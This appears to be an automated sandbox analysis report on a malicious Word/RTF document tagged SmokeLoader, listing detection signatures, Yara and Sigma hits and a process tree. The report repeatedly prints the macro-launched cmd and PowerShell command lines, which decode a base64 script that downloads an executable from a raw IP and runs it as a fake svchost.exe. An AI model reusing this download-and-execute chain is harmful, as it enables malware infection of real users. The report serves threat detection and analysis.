
Windows Analysis Report
472.rtf.doc

Overview

General Information

Sample name: 472.rtf.doc (renamed because original name is a hash value)
Original sample name: 472.rtf.doc
Analysis ID: 1446716
MD5: 0bd1328012301d04bdc921acb321b820
SHA1: 724612a3c88f187aa000efe4ff4e9e04c9553696
SHA256: 7be9ef61632edc0f2fc6ad59d64ad69dbffbd05013a80ab1dfbb6bd8a6090b66
Tags: doc, Dofoil, rtf, SmokeLoader

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected SmokeLoader
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Encrypted powershell cmdline option found
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1096 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 1408 cmdline: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C; MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • timeout.exe (PID: 1900 cmdline: timeout 3 MD5: 68A0A50CCAD87E1EE1944410A96D066C)
      • powershell.exe (PID: 1432 cmdline: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C; MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA= MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • svchost.exe (PID: 3188 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: 92C57DD80B764A028749520017D44E76)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution:
  • SMOKY SPIDER
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
No configs have been found
Source | Rule | Description | Author | Strings
Source: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Smokeloader_3687686f; Description: unknown; Author: unknown; Strings:
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Source: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp; Rule: Windows_Trojan_RedLineStealer_ed346e4c; Description: unknown; Author: unknown; Strings:
  • 0x2edd:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Source: Process Memory Space: powershell.exe PID: 1432; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 1432; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
Source: Process Memory Space: powershell.exe PID: 3084; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security

Source | Rule | Description | Author | Strings
Source: 7.2.svchost.exe.220e67.0.raw.unpack; Rule: JoeSecurity_SmokeLoader_2; Description: Yara detected SmokeLoader; Author: Joe Security

        System Summary

        Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1096, ParentProcessName: WINWORD.EXE, ProcessCommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ProcessId: 1408, ProcessName: cmd.exe
        Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3084, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
        Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1096, ParentProcessName: WINWORD.EXE, ProcessCommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ProcessId: 1408, ProcessName: cmd.exe
        Source: Process started; Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t; Data: Command: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1408, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ProcessId: 1432, ProcessName: powershell.exe
        Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, ProcessId: 3084, ProcessName: powershell.exe
        Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io; Data: Command: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1096, ParentProcessName: WINWORD.EXE, ProcessCommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ProcessId: 1408, ProcessName: cmd.exe
        Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, ProcessId: 3084, ProcessName: powershell.exe
        Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3084, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 3188, ProcessName: svchost.exe
        Source: Process started; Author: frack113; Data: Command: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: 